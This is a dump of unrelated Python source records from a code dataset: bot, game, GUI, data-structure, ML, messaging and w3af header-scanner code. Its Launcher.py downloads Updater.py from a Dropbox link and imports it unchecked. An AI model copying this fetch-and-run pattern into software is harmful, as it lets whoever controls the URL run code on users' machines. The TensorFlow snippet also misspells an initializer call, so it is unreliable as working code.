InlineKeyboardButton(_(\"MENU:TEST\"), callback_data='menu_test') \nbuttons[\"de\"] =InlineKeyboardButton(_(\"MENU:CONF:language:de\"), callback_data='language_de')\nbuttons[\"en\"] =InlineKeyboardButton(_(\"MENU:CONF:language:en\"), callback_data='language_en')\n\nkeyboard[\"de_start\"] = InlineKeyboardMarkup(\n [\n [ buttons[\"de\"] , buttons[\"en\"]],\n [ buttons[\"test\"] ],\n ]\n )\n\nen.install()\n\n\nclass Skeleton(object):\n def __init__(self):\n self.handlers = [\n CommandHandler('start', self.start),\n CallbackQueryHandler(pattern='^language_', callback=self.languages),\n CallbackQueryHandler(callback=self.menu),\n ]\n\n def menu(self,bot, update):\n query = update.callback_query\n chat_id = query.message.chat_id\n message_id=query.message.message_id\n reply_markup = keyboard[\"en_start\"]\n bot.editMessageText(\n text=_(\"STARTMENU\") ,\n chat_id=chat_id,\n message_id=message_id,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n\n def start(self,bot,update):\n reply_markup = keyboard[\"en_start\"]\n bot.sendMessage(\n text=_(\"MENU\") ,\n chat_id=update.message.chat_id,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n\n def languages(self,bot,update):\n query = update.callback_query\n lang = query.data.split(\"_\")[1]\n if lang == \"de\" :\n de.install()\n elif lang == \"en\" :\n en.install()\n lang_keyboard =\"%s_start\" % lang\n\n print(\"language: %s - keyboard: %s\" % (lang , lang_keyboard))\n\n reply_markup=keyboard[lang_keyboard]\n\n bot.editMessageText(\n text=_(\"LANGUAGE CHANGE IN *%s*\") % lang ,\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n\n def get_handlers(self):\n return self.handlers\n","sub_path":"modules/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"417777247","text":"from typing import List, Union\n\nfrom battle.businesslogic.effects.Effect import Effect\nfrom battle.businesslogic.effects.EffectFactory import EffectFactory\nfrom cards.models import Card, CardEffect\nfrom .Buff import Buff\n\n\nclass BattleCard:\n \"\"\"\n\n \"\"\"\n\n def __init__(self, card_model: Card):\n \"\"\"\n Creates BattleCard instance.\n @param card_model: Database model.\n \"\"\"\n\n self.card_model = card_model\n\n effects_factory = EffectFactory.get_instance()\n self.effects = []\n for effect_model in card_model.effects.all():\n self.effects.append(effects_factory.create(effect_model))\n\n self.turns_blocked = 0\n\n def use(self) -> List[Effect]:\n \"\"\"\n Updates card's buffs and returns list of card's effects to be executed in battle simulation.\n @return: List of effects to be executed by battle simulator.\n \"\"\"\n\n self._update_effects()\n\n if self.turns_blocked > 0:\n self.turns_blocked -= 1\n return [] # If card is blocked it should be executed without effects.\n\n return self.effects\n\n def _update_effects(self) -> None:\n for effect in self.effects:\n effect.update()\n\n def assign_buff(self, buff: Buff, effect_type: Union[CardEffect.EffectId, None] = None):\n \"\"\"\n This method assigns a buff to this card's appropriate effects.\n @param: buff - Buff instance\n @param: effect_type - Enum that will determine which effect will be boosted\n \"\"\"\n for effect in self.effects:\n # We check if any of the effects if of the type specified in the parameter\n # If we specified none, it applies to all effect types.\n card_type = effect.effect_model.card_effect.id\n if effect_type is None or card_type == effect_type:\n effect.add_buff(buff)\n","sub_path":"WMIAdventure/backend/WMIAdventure_backend/battle/businesslogic/BattleCard.py","file_name":"BattleCard.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"638592462","text":"from PySide.QtCore import QRectF,QPointF,Qt\nfrom PySide.QtGui import QPainterPath, QFont\n\nclass Style(object):\n @staticmethod\n def roundedRectPath(x,y,width,height,\n TLRX,TLRY, TRRX,TRRY,\n BLRX,BLRY, BRRX,BRRY):\n right = x + width\n bottom = y + height\n \n if TLRX <= 0: TLRX = 0.1\n if TLRY <= 0: TLRY = 0.1\n if TRRX <= 0: TRRX = 0.1\n if TRRY <= 0: TRRY = 0.1 # path cannot handle 0\n if BLRX <= 0: BLRX = 0.1 # as rounding values\n if BLRY <= 0: BLRY = 0.1\n if BRRX <= 0: BRRX = 0.1\n if BRRY <= 0: BRRY = 0.1\n \n path = QPainterPath(QPointF(x,y))\n \n path.arcTo(x, y,\n TLRX * 2.0, TLRY * 2.0,\n 180.0, -90.0);\n \n path.arcTo(right - TRRX * 2.0, y,\n TRRX * 2.0, TRRY * 2.0,\n 90.0, -90.0);\n \n path.arcTo(right - BRRX * 2.0, bottom - BRRY * 2.0,\n BRRX * 2.0, BRRY * 2.0,\n 0.0 , -90.0);\n path.arcTo(x, bottom - BLRY * 2.0,\n BLRX * 2.0, BLRY * 2.0,\n -90.0, -90.0);\n \n path.closeSubpath()\n \n return path\n \n @staticmethod\n def BasicRect(painter,widget):\n# widgetRect = QRectF(0,0,widget.width(),widget.height()).adjusted(0.5,0.5,-0.5,-0.5)\n \n painter.setPen(Qt.NoPen)\n \n borderpath = Style.roundedRectPath(0,\n 0,\n widget.width(),\n widget.height(),\n \n widget.topLeftRoundingX(), widget.topLeftRoundingY(),\n widget.topRightRoundingX(), widget.topRightRoundingY(),\n widget.bottomLeftRoundingX(), widget.bottomLeftRoundingY(),\n widget.bottomRightRoundingX(), widget.bottomRightRoundingY())\n \n painter.setBrush(widget.borderColor())\n painter.drawPath(borderpath)\n \n bgpath = Style.roundedRectPath(0 + widget.leftBorderWidth(),\n 0 + widget.topBorderWidth(),\n widget.width() - widget.leftBorderWidth() - widget.rightBorderWidth(),\n widget.height() - widget.topBorderWidth() - widget.bottomBorderWidth(),\n \n widget.topLeftRoundingX(), widget.topLeftRoundingY(),\n widget.topRightRoundingX(), widget.topRightRoundingY(),\n widget.bottomLeftRoundingX(), widget.bottomLeftRoundingY(),\n widget.bottomRightRoundingX(), widget.bottomRightRoundingY())\n \n painter.setBrush(widget.color())\n painter.drawPath(bgpath)\n \n @staticmethod\n def PlainText(painter,widget):\n painter.setPen(widget.textColor())\n \n font = QFont()\n font.setPixelSize(widget.fontSize())\n \n font.setOverline(widget.overline())\n font.setUnderline(widget.underlined())\n font.setItalic(widget.italic())\n font.setStrikeOut(widget.strikeOut())\n \n font.setWeight(widget.fontWeight())\n font.setFamily(widget.fontFamily())\n font.setCapitalization( QFont.Capitalization(widget.textTransform()) )\n \n font.setStretch(widget.fontStretch())\n font.setLetterSpacing(QFont.SpacingType(widget.letterSpacingType()), widget.letterSpacing())\n font.setWordSpacing(widget.wordSpacing())\n \n painter.setFont(font)\n \n painter.drawText(0,0,100,100,widget.textAlignment(),widget.text())\n \n @staticmethod\n def paintWidget(painter,widget):\n for func in widget.styleOptions:\n func(painter,widget) # call each style option\n \n \n \n \n ","sub_path":"style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"214331359","text":"import urllib.request\nimport os\nversion=0\nactualVersion=0\ndef VersionCheck(version,actualVersion):\n try:\n t=open(\"LauncherVersion.version\",\"r\")\n t.close()\n except IOError:\n t = open(\"LauncherVersion.version\",\"w\")\n t.write(\"0\")\n t.close\n with open(\"LauncherVersionCheck.version\",'wb') as f:\n r=urllib.request.urlopen(\"https://dl.dropbox.com/s/k50358q0ztyhp84/LauncherVersion.txt?dl=1\").read()\n f.write(r)\n f.close()\n t=open(\"LauncherVersion.version\")\n version=(t.readline())\n t.close()\n f=open(\"LauncherVersionCheck.version\")\n actualVersion=(f.readline())\n f.close\n if version!=actualVersion:\n print(\"Your Updater isnt actual enough.\")\n print(\"Start Download Updater\")\n f= open(\"Updater.py\",'wb')\n r=urllib.request.urlopen(\"https://dl.dropbox.com/s/1sknewxxqhal2hs/Updater.py?dl=1\").read()\n f.write(r)\n f.close()\n f=open('LauncherVersion.version', 'w')\n f.write(actualVersion)\n f.close\n f=open('LauncherVersion.version','r')\n f.close\n print(\"Updater Download finished\")\n if version==actualVersion:\n print(\"Updater got the actual Version.\")\nVersionCheck(version,actualVersion)\nos.system('cls' if os.name=='nt' else 'clear')\nos.remove(\"LauncherVersionCheck.version\")\nimport Updater\n \n\n","sub_path":"Launcher.py","file_name":"Launcher.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"287161204","text":"class Node(object):\n def __init__(self, val, start, end):\n self.sum = val\n self.right, self.left = None, None\n self.range = [start, end]\n\n\nclass SegementTree(object):\n def __init__(self, size):\n self.root = self._build_segment_tree(0, size - 1)\n\n def _build_segment_tree(self, start, end):\n if start > end:\n return None\n node = Node(0, start, end)\n if start == end:\n return node\n mid = (start + end) // 2\n node.left, node.right = self._build_segment_tree(start, mid), self._build_segment_tree(mid + 1, end)\n return node\n\n def update(self, index, val, root=None):\n root = root or self.root\n if index < root.range[0] or index > root.range[1]:\n return\n root.sum += val\n if index == root.range[0] == root.range[1]:\n return\n self.update(index, val, root.left)\n self.update(index, val, root.right)\n\n def range_sum(self, start, end, root=None):\n root = root or self.root\n if end < root.range[0] or start > root.range[1]:\n return 0\n if start <= root.range[0] and end >= root.range[1]:\n return root.sum\n return self.range_sum(start, end, root.left) + self.range_sum(start, end, root.right)\n\n\nclass NumArray(object):\n def __init__(self, nums):\n self.nums = nums\n self.segment_tree = SegementTree(len(nums))\n for index, num in enumerate(nums):\n self.segment_tree.update(index, num)\n\n def update(self, i, val):\n diff = val - self.nums[i]\n self.segment_tree.update(i, diff)\n self.nums[i] = val\n\n def sumRange(self, i, j):\n return self.segment_tree.range_sum(i, j)\n","sub_path":"307/307.range-sum-query-mutable.233033079.Accepted.leetcode.py","file_name":"307.range-sum-query-mutable.233033079.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"517221736","text":"\"\"\"\nCopyright (c) 2021 The authors of SG Tree All rights reserved.\n\nInitially modified from cover_tree.py of CoverTree\nhttps://github.com/manzilzaheer/CoverTree\nCopyright (c) 2017 Manzil Zaheer All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport pickle\nimport numpy as np\n\nimport covertreec\n\n\nclass Node(object):\n \"\"\"CoverTree node from c++.\"\"\"\n base_vars = ['this', 'uid', 'level', 'point', 'maxdistUB']\n\n def __init__(self, this):\n info = covertreec.node_property(this)\n info['this'] = this\n if info['others']:\n others = pickle.loads(info['others'])\n info.update(others)\n del info['others']\n self.__dict__ = info\n\n @property\n def children(self):\n return [Node(child) for child in covertreec.node_children(self.this)]\n\n def __setattr__(self, name, value):\n if name not in self.base_vars:\n super(Node, self).__setattr__(name, value)\n props = {k: v for k, v in vars(self).items() if k not in self.base_vars}\n if props:\n covertreec.node_save(self.this, pickle.dumps(props))\n else:\n print('Cannot set {}'.format(name))\n\nclass NNS_L2(object):\n \"\"\"CoverTree Class for NN search in Euclidean distance.\"\"\"\n\n def __init__(self, this):\n if isinstance(this, tuple):\n self.this = this[0]\n self.root = Node(this[1])\n elif isinstance(this, int):\n self.this = this\n self.root = None\n else:\n raise NotImplementedError('this pointer should be int or tuple')\n\n def __del__(self):\n covertreec.delete(self.this)\n\n def __reduce__(self):\n buff = self.serialize()\n return (NNS_L2.from_string, (buff,))\n \n def __len__(self):\n return covertreec.size(self.this)\n\n @classmethod\n def from_matrix(cls, points, trunc=-1, use_multi_core=-1):\n ptr = covertreec.new(points, trunc, use_multi_core)\n return cls(ptr)\n\n @classmethod\n def from_string(cls, buff):\n ptr = covertreec.deserialize(buff)\n return cls(ptr)\n\n def insert(self, point, uid=None, use_multi_core=-1):\n if len(point.shape) == 1:\n return covertreec.insert(self.this, point, -1 if uid is None else uid)\n elif len(point.shape) == 2:\n if uid is None:\n N = covertreec.size(self.this)\n uid = np.arange(N, N + point.shape[0])\n return covertreec.batchinsert(self.this, point, uid, use_multi_core)\n else:\n print(\"Points to be inserted should be 1D or 2D matrix!\")\n\n def remove(self, point):\n return covertreec.remove(self.this, point)\n\n def NearestNeighbour(self, points, use_multi_core=-1, return_points=False):\n return covertreec.NearestNeighbour(self.this, points, use_multi_core,\n return_points)\n\n def kNearestNeighbours(self,\n points,\n k=10,\n use_multi_core=-1,\n return_points=False):\n return covertreec.kNearestNeighbours(self.this, points, k, use_multi_core,\n return_points)\n\n def RangeSearch(self,\n points,\n r=1.0,\n use_multi_core=-1,\n return_points=False):\n return covertreec.RangeSearch(self.this, points, r, use_multi_core,\n return_points)\n\n def serialize(self):\n return covertreec.serialize(self.this)\n\n def display(self):\n return covertreec.display(self.this)\n\n def stats(self):\n return covertreec.stats(self.this)\n\n def test_covering(self):\n return covertreec.test_covering(self.this)\n \n def test_nesting(self):\n return covertreec.test_nesting(self.this)\n\n def spreadout(self, k):\n return covertreec.spreadout(self.this, k)\n \n def get_root(self):\n return Node(covertreec.get_root(self.this))\n\nclass MIPS(NNS_L2):\n \"\"\"CoverTree Class for maximum inner product search.\"\"\"\n\n def __init__(self, this, phi2):\n super(MIPS, self).__init__(this)\n self.phi2 = phi2\n\n def __reduce__(self):\n buff = self.serialize()\n return (MIPS.from_string, (buff, self.phi2))\n \n def __len__(self):\n return covertreec.size(self.this)\n\n @classmethod\n def from_matrix(cls, points, trunc=-1, user_max=None, use_multi_core=-1):\n # Find norm of points\n norm2 = (points**2).sum(1)\n phi2 = np.max(norm2) if user_max is None else user_max\n modified_points = np.hstack((points, np.sqrt(phi2 - norm2)[:, np.newaxis]))\n ptr = covertreec.new(modified_points, trunc, use_multi_core)\n return cls(ptr, phi2)\n\n @classmethod\n def from_string(cls, buff, phi2):\n ptr = covertreec.deserialize(buff)\n return cls(ptr, phi2)\n\n def insert(self, point, uid=None, use_multi_core=-1):\n if len(point.shape) == 1:\n norm2 = np.dot(point, point)\n modified_point = np.append(point, np.sqrt(self.phi2 - norm2))\n return covertreec.insert(self.this, modified_point, -1 if uid is None else uid)\n elif len(point.shape) == 2:\n if uid is None:\n N = covertreec.size(self.this)\n uid = np.arange(N, N + point.shape[0])\n norm2 = (point**2).sum(1)\n modified_points = np.hstack((point, np.sqrt(self.phi2 - norm2)[:, np.newaxis]))\n return covertreec.batchinsert(self.this, modified_points, uid, use_multi_core)\n else:\n print(\"Points to be inserted should be 1D or 2D matrix!\")\n\n def remove(self, point):\n norm2 = np.dot(point, point)\n modified_point = np.append(point, np.sqrt(self.phi2 - norm2))\n return covertreec.remove(self.this, modified_point)\n\n def NearestNeighbour(self, points, use_multi_core=-1, return_points=False):\n modified_points = np.hstack(\n (points, np.zeros((points.shape[0], 1), dtype=points.dtype)))\n ret_val = list(\n covertreec.NearestNeighbour(self.this, modified_points, use_multi_core,\n return_points))\n norm2 = (points**2).sum(1)\n ret_val[1] = 0.5 * (self.phi2 + norm2 - ret_val[1]**2)\n return tuple(ret_val)\n\n def kNearestNeighbours(self,\n points,\n k=10,\n use_multi_core=-1,\n return_points=False):\n \"\"\"main nearest neighbor function.\"\"\"\n modified_points = np.hstack(\n (points, np.zeros((points.shape[0], 1), dtype=points.dtype)))\n import time \n st_t = time.time()\n ret_val = list(\n covertreec.kNearestNeighbours(self.this, modified_points, k,\n use_multi_core, return_points))\n st_e = time.time()\n norm2 = (points**2).sum(1)[:, np.newaxis]\n ret_val[1] = 0.5 * (self.phi2 + norm2 - ret_val[1]**2)\n return tuple(ret_val)\n\n def RangeSearch(self,\n points,\n r=1.0,\n use_multi_core=-1,\n return_points=False):\n raise NotImplementedError('Range for MIPS not clear')\n\nclass MCSS(NNS_L2):\n \"\"\"CoverTree Class for NN search in cosine distance.\"\"\"\n\n def __init__(self, this):\n super(MCSS, self).__init__(this)\n\n def __reduce__(self):\n buff = self.serialize()\n return (MCSS.from_string, (buff,))\n\n @classmethod\n def from_matrix(cls, points, trunc=-1, use_multi_core=-1):\n # Find norm of points\n norm = np.sqrt((points**2).sum(1))\n modified_points = points / norm[:, np.newaxis]\n ptr = covertreec.new(modified_points, trunc, use_multi_core)\n return cls(ptr)\n\n @classmethod\n def from_string(cls, buff):\n ptr = covertreec.deserialize(buff)\n return cls(ptr)\n\n def insert(self, point):\n norm = np.sqrt(np.dot(point, point))\n modified_point = point / norm\n return covertreec.insert(self.this, modified_point)\n\n def remove(self, point):\n norm = np.sqrt(np.dot(point, point))\n modified_point = point / norm\n return covertreec.remove(self.this, modified_point)\n\n def NearestNeighbour(self, points, use_multi_core=-1, return_points=False):\n ret_val = list(\n covertreec.NearestNeighbour(self.this, points, use_multi_core,\n return_points))\n norm = np.sqrt((points**2).sum(1))\n ret_val[1] = 0.5 * (1.0 / norm + norm - ret_val[1]**2 / norm)\n return tuple(ret_val)\n\n def kNearestNeighbours(self,\n points,\n k=10,\n use_multi_core=-1,\n return_points=False):\n \"\"\"main nearest neighbor function.\"\"\"\n ret_val = list(\n covertreec.kNearestNeighbours(self.this, points, k, use_multi_core,\n return_points))\n norm = np.sqrt((points**2).sum(1))[:, np.newaxis]\n ret_val[1] = 0.5 * (1.0 / norm + norm - ret_val[1]**2 / norm)\n return tuple(ret_val)\n\n def RangeSearch(self,\n points,\n r=1.0,\n use_multi_core=-1,\n return_points=False):\n raise NotImplementedError('Range for MIPS not clear')\n","sub_path":"graphgrove/covertree.py","file_name":"covertree.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"286725410","text":"\"\"\"Convolutional NN similar to VGG for use with KerasLearner.\"\"\"\nimport numpy as np\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Input, Convolution2D, concatenate\n\n\ndef keras_dnn_ws(d_img, d_ws, d_act):\n \"\"\"\n d_img, d_ws are input dimensions (tuples)\n \"\"\"\n # CNN with vision input\n inp_img = Input(shape=d_img, name='input_img')\n conv_1 = Convolution2D(32, (3, 3), padding='same', activation='relu',\n name='conv_1')(inp_img)\n conv_2 = Convolution2D(32, (3, 3), padding='same', activation='relu',\n name='conv_2')(conv_1)\n pool_1 = MaxPooling2D(pool_size=(2, 2), name='pool_1')(conv_2)\n\n conv_3 = Convolution2D(64, (3, 3), padding='same', activation='relu',\n name='conv_3')(pool_1)\n conv_4 = Convolution2D(64, (3, 3), padding='same', activation='relu',\n name='conv_4')(conv_3)\n pool_2 = MaxPooling2D(pool_size=(2, 2), name='pool_2')(conv_4)\n\n conv_5 = Convolution2D(128, (3, 3), padding='same', activation='relu',\n name='conv_5')(pool_2)\n conv_6 = Convolution2D(128, (3, 3), padding='same', activation='relu',\n name='conv_6')(conv_5)\n pool_3 = MaxPooling2D(pool_size=(2, 2), name='pool_3')(conv_6)\n\n flat = Flatten()(pool_3)\n fc_1 = Dense(512, activation='relu', name='fully_connected_1')(flat)\n drop_1 = Dropout(0.5, name='dropout_1')(fc_1)\n fc_2 = Dense(256, activation='relu', name='fully_connected_2')(drop_1)\n drop_2 = Dropout(0.25, name='dropout_2')(fc_2)\n\n # feedforward (fully-connected) network with wheel speed input\n inp_ws = Input(shape=[d_ws], name='input_ws')\n fc_ws_1 = Dense(64, activation='relu', name='fully_connected_ws')(inp_ws)\n\n # concatenate two models\n concat = concatenate([drop_2, fc_ws_1], name='concatenate')\n fc_3 = Dense(128, activation='relu', name='fully_connected_3')(concat)\n drop_3 = Dropout(0.25, name='dropout_3')(fc_3)\n out_u = Dense(d_act, activation='linear', name='output_action')(drop_3)\n\n model = Model(inputs=[inp_img, inp_ws], outputs=out_u)\n\n return model\n","sub_path":"scripts/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"50054516","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom queue import Queue, Empty\nfrom threading import Thread\nfrom nanomsg import Socket, PAIR, SUB, PUB, PUSH,SUB_SUBSCRIBE, AF_SP,SOL_SOCKET,RCVTIMEO\nfrom datetime import datetime\nimport os\n\nfrom .datastruct import *\n\n\nclass ClientMq(object):\n def __init__(self, config, ui_event_engine, outgoing_quue):\n self._ui_event_engine = ui_event_engine\n self._outgoing_quue = outgoing_quue\n self._config = config\n\n self._active = False\n self._thread = Thread(target=self._run)\n\n def _run(self):\n # os.system(\"taskset -cp 5 %d \" % os.getpid())\n while self._active:\n try:\n # response msg from server\n msgin = self._recv_sock.recv(flags=0)\n msgin = msgin.decode(\"utf-8\")\n if msgin is not None and msgin.index('|') > 0:\n print('client rec broker msg:',msgin,'at ', datetime.now())\n if msgin[-1] == '\\0':\n msgin = msgin[:-1]\n if msgin[-1] == '\\x00':\n msgin = msgin[:-1]\n v = msgin.split('|')\n msg2type = MSG_TYPE(int(v[2]))\n if msg2type == MSG_TYPE.MSG_TYPE_TICK_L1:\n m = TickEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m) \n elif msg2type == MSG_TYPE.MSG_TYPE_RTN_ORDER:\n m = OrderStatusEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_RTN_TRADE:\n m = FillEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_RSP_POS:\n m = PositionEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_Hist:\n m = HistoricalEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_RSP_ACCOUNT:\n m = AccountEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_RSP_CONTRACT:\n m = ContractEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif v[2].startswith('3') : #msg2type == MSG_TYPE.MSG_TYPE_INFO:\n m = InfoEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n pass\n except Exception as e: \n pass\n try:\n # request, qry msg to server\n msgout = self._outgoing_quue.get(False)\n print('outgoing get msg,begin send',msgout,datetime.now())\n # self._send_sock.send(bytes(msgout,\"ascii\"), flags=0)\n self._send_sock.send(msgout, flags=1)\n print('outgoing end send',msgout,datetime.now())\n except Exception as e:\n pass\n\n def start(self, timer=True):\n \"\"\"\n start the mq thread\n \"\"\"\n self._recv_sock = Socket(SUB)\n self._send_sock = Socket(PUSH)\n self._monitor_sock = Socket(SUB)\n # print(os.getpid())\n self._recv_sock.connect(self._config['serverpub_url'])\n self._recv_sock.set_string_option(SUB, SUB_SUBSCRIBE, '') # receive msg start with all\n self._recv_sock.set_int_option(SOL_SOCKET,RCVTIMEO,100) \n self._send_sock.connect(self._config['serverpull_url'])\n self._monitor_sock.connect(self._config['serversub_url'])\n self._active = True\n if not self._thread.isAlive():\n self._thread.start()\n\n def stop(self):\n \"\"\"\n stop the mq thread\n \"\"\"\n self._active = False\n\n if self._thread.isAlive():\n self._thread.join()","sub_path":"source/common/client_mq.py","file_name":"client_mq.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"519522312","text":"import tensorflow as tf\n\n# Normal loading (recommended)\nx = tf.Variable(10, name='x')\ny = tf.Variable(20, name='y')\nz = tf.add(x, y) # create the node before executing the graph\n\nwriter = tf.summary.FileWriter('./graphs/normal_loading', tf.get_default_graph())\nwith tf.Session() as sess:\n\tsess.run(tf.global_variables_initializer())\n\tfor _ in range(10):\n\t\tsess.run(z)\nwriter.close()\n\n# Lazy loading\nx = tf.Variable(10, name='x')\ny = tf.Variable(20, name='y')\n\nwriter = tf.summary.FileWriter('./graphs/lazy_loading', tf.get_default_graph())\nwith tf.Session() as sess:\n\tsess.run(tf.global_variable_initializer())\n\tfor _ in range(10):\n\t\tsess.run(tf.add(x, y))\t# someone decides to be clever to save one line of code\nwriter.close()","sub_path":"02_lazy_loading.py","file_name":"02_lazy_loading.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"87592894","text":"\"\"\"\nwg_strange_headers.py\n\nCopyright 2006 Andres Riancho\n\nThis file is part of w3af, http://w3af.org/ .\n\nw3af is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation version 2 of the License.\n\nw3af is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with w3af; if not, write to the Free Software\nFoundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\"\"\"\nfrom w3af.core.controllers.plugins.audit_plugin import AuditPlugin\nfrom w3af.core.data.kb.info import Info\n\n\nclass wg_strange_headers(AuditPlugin):\n \"\"\"\n Check for uncommon headers sent in HTTP response.\n\n :author: Andres Riancho (andres.riancho@gmail.com)\n :author: EM (mailto@zensecurity.su)\n \"\"\"\n # Remember that this headers are only the ones SENT BY THE SERVER TO THE\n # CLIENT. Headers must be uppercase in order to compare them\n COMMON_HEADERS = {'ACCEPT-RANGES', 'AGE', 'ALLOW', 'CONNECTION',\n 'CONTENT-DISPOSITION', 'CONTENT-ENCODING',\n 'CONTENT-LENGTH', 'CONTENT-TYPE', 'CONTENT-SCRIPT-TYPE',\n 'CONTENT-STYLE-TYPE', 'CONTENT-SECURITY-POLICY',\n 'CONTENT-SECURITY-POLICY-REPORT-ONLY', 'CONTENT-LANGUAGE',\n 'CONTENT-LOCATION', 'CACHE-CONTROL', 'DATE', 'EXPIRES',\n 'ETAG', 'FRAME-OPTIONS', 'KEEP-ALIVE', 'LAST-MODIFIED',\n 'LOCATION', 'P3P', 'PUBLIC', 'PUBLIC-KEY-PINS',\n 'PUBLIC-KEY-PINS-REPORT-ONLY', 'PRAGMA',\n 'PROXY-CONNECTION', 'SET-COOKIE', 'SERVER',\n 'STRICT-TRANSPORT-SECURITY', 'TRANSFER-ENCODING', 'VIA',\n 'VARY', 'WWW-AUTHENTICATE', 'X-FRAME-OPTIONS',\n 'X-CONTENT-TYPE-OPTIONS', 'X-POWERED-BY',\n 'X-ASPNET-VERSION', 'X-CACHE', 'X-UA-COMPATIBLE', 'X-PAD',\n 'X-XSS-PROTECTION', 'MIME-VERSION', 'ALTERNATE-PROTOCOL', 'X-XRDS-LOCATION',\n 'ACCESS-CONTROL-ALLOW-ORIGIN'}\n\n def audit(self, freq, orig_response):\n \"\"\"\n :param freq: A FuzzableRequest\n :param orig_resp: The HTTP response we get from sending the freq\n :return: None, all results are saved in the kb.\n \"\"\"\n # Should we remove that check for protocol anomalies ? # by em\n self._content_location_not_300(freq, orig_response)\n\n # Check header names\n for header_name in orig_response.get_headers().keys():\n if header_name.upper() in self.COMMON_HEADERS:\n continue\n # Create a new info object and save it to the KB\n header_value = orig_response.get_headers()[header_name]\n\n desc = 'Host sent strange HTTP header: \"{}\" with value: \"{}\", ' \\\n 'which is quite uncommon and requires manual analysis.'.format(header_name, header_value)\n i = Info('Strange header', desc, orig_response.id, self.get_name())\n i.set_url(orig_response.get_url())\n self.kb_append(self, 'wg_strange_headers', i)\n\n def _content_location_not_300(self, freq, orig_response):\n \"\"\"\n Check if the response has a content-location header and the response\n code is not in the 300 range.\n\n :return: None, all results are saved in the kb.\n \"\"\"\n response_url = orig_response.get_url()\n\n headers = orig_response.get_headers()\n header_value = headers.get('content-location', None)\n\n if header_value is not None and 300 < orig_response.get_code() < 310:\n desc = 'The URL: \"{}\" sent the HTTP header: \"content-location\" ' \\\n 'with value: \"{}\" in an HTTP response with code {} ' \\\n 'which is a violation to the RFC.'.format(response_url, header_value, orig_response.get_code())\n i = Info('Content-Location HTTP header anomaly', desc, orig_response.id, self.get_name())\n i.set_url(response_url)\n self.kb_append(self, 'wg_anomaly', i)\n\n def get_long_desc(self):\n \"\"\"\n :return: A DETAILED description of the plugin functions and features.\n \"\"\"\n return 'This plugin checks for non-common headers sent in HTTP responses. ' \\\n 'It is could be useful to identify special modules and features added to the server.'\n\n def get_name(self):\n \"\"\"\n :return: Common name for the current plugin\n \"\"\"\n return 'strange headers'","sub_path":"w3af-repo/w3af/plugins/audit/wg_strange_headers.py","file_name":"wg_strange_headers.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"239493467","text":"# -*- coding: utf-8 -*-\n\nfrom ig_api import db, app\nfrom ig_api.helpers import send_trans_email\n\n\n## Exceptions\n\nclass SignUpRequestException(Exception):\n def __init__(self):\n self.message = 'There was a problem while saving the sign up request.'\n\n\n## Models\n\nclass SignUpRequestModel(db.Document):\n name = db.StringField(required=True)\n email = db.EmailField(required=True)\n phone = db.StringField()\n\n meta = {'collection': 'signup_requests'}\n\n @staticmethod\n def create(name, email, phone=None):\n \"\"\"Creates a new model with the details of the sign up request.\"\"\"\n # create model\n request = SignUpRequestModel(name=name, email=email)\n if 